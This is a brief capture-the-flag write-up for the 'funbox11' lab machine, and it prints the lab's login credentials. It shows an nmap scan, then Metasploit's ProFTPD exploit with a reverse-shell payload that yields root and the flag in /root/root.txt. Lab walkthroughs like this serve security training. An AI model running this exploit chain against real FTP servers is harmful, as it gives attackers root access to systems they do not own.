Challenge

We were provided with this info

https://77.87.243.155
username: alpha
password: 900d1uck734m41ph4

and we will use it to log in to the web Kali box that we will use to solve the machine

Writeup

I had a little idea that they have the machine on the same box so I checked the hosts to know the ip

cat /etc/hosts

yup I was right the ip was there 192.168.204.3 funbox11

let’s scan it using nmap

I used this command

nmap -v -T4 -sC -sV -p-  192.168.204.3

there was a running service that caught my eye

and that was it, I used metasploit to search for this service

search ProFTPD

I tried the last 2 payloads and only number 5 worked

use 5

then I wanted to see the payloads by using show payloads

I used the reverse one set payload 3

also I set the RHOST, LHOST and the LPORT

then I used show options to check if everything was right

okay let’s start the attack by using run

it worked let’s use whoami to know the user that I have

that’s it I was root so let’s find the flag

as always it was /root/root.txt

just by sending

cd /root
cat root.txt

I got the flag

And pingo… that was it